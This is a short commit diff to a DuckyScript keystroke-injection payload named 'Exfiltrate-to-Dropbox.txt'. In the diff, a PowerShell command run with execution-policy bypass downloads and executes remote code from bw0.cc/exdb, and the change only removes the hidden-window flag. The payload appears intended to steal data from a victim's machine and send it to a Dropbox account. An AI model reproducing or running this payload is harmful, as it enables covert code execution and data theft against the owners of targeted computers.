Update Exfiltrate-to-Dropbox.txt

This commit is contained in:
egieb
2025-06-20 10:54:12 +00:00
committed by GitHub
parent e5324b6497
commit 4894ab7ff6

View File

@@ -14,6 +14,6 @@ REM open powershell (remove -W Hidden to show the window)
DELAY 1000
GUI r
DELAY 750
STRING powershell -Ep Bypass -W H -C $db='DROPBOX_TOKEN'; iex (irm bw0.cc/exdb)
STRING powershell -Ep Bypass -C $db='DROPBOX_TOKEN'; iex (irm bw0.cc/exdb)
ENTER